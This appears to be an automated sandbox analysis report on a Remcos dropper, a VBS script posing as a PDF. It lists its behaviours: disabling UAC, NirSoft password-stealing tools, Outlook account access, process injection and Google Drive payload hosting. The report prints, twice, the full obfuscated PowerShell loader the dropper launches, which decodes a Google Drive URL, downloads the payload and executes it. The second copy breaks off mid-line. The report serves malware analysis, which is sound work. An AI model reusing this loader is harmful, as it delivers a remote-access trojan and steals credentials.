Analysis Overview
SHA256
2bd56ceb64c1a9af7909370d31a3bfd6bb3debcfbb674491cc081b4a7088832a
Threat Level: Known bad
The file 074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
UAC bypass
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Uses browser remote debugging
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry key
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 09:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 09:02
Reported
2024-11-11 09:04
Platform
win7-20241010-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2320 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2320 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2320 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"
Network
Files
C:\Users\Admin\AppData\Local\Temp\CabE562.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2724-20-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp
memory/2724-21-0x000000001B270000-0x000000001B552000-memory.dmp
memory/2724-22-0x0000000002360000-0x0000000002368000-memory.dmp
memory/2724-23-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-24-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-26-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-25-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-27-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-28-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-29-0x000007FEF63DE000-0x000007FEF63DF000-memory.dmp
memory/2724-30-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-31-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-32-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
memory/2724-33-0x000007FEF6120000-0x000007FEF6ABD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 09:02
Reported
2024-11-11 09:04
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2400 set thread context of 2424 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2400 set thread context of 4448 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2400 set thread context of 3764 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os 